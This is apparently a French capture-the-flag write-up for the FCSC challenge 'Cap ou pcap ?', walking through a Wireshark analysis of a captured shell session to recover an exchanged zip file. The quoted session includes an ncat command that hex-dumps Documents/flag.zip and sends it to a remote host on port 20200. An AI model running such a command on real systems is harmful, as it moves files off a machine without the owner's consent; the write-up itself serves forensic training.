search

Cap ou pcap ?

hashtag
Énoncé

Voici la capture d’une communication réseau entre deux postes. Un fichier a été échangé et vous devez le retrouver.

Le flag est présent dans le contenu du fichier.

cap.pcaparrow-up-right

hashtag
Analyse de la capture

En ouvrant la capture nous remarquons des échanges TCP entre 2 hôtes.

Au bout de la trame 6, des informations relatives à un système linux apparaissent, j'ouvre le flux TCP sur cette trame.

id
uid=1001(fcsc) gid=1001(fcsc) groups=1001(fcsc)
pwd
/home/fcsc
07:10:25 up 24 min,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
fcsc     tty7     :0               06:46   24:47   3.13s  0.00s /bin/sh /etc/xdg/xfce4/xinitrc -- /etc/X11/xinit/xserverrc
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
ls Documents
flag.zip
file Documents/flag.zip
Documents/flag.zip: Zip archive data, at least v2.0 to extract
xxd -p Documents/flag.zip | tr -d '\n' | ncat 172.20.20.133 20200
exit

La commande pour l'échange du fichier est :

xxd -p Documents/flag.zip | tr -d '\n' | ncat 172.20.20.133 20200

On regarde rapidement le manuel de xxd sous linux :

La commande récupere le hexdump de flag.zip, supprime les retours à la ligne avec tr et transfert le fichier avec ncat.

Cherchons les données du fichiers dans les trames, notamment la trame la plus "grosse".

La trame 27 contient les données relatives à l'échanges :

Il ne reste plus qu'à faire le processus inverse.

PrécédentFind MeSuivantRandomito

Mis à jour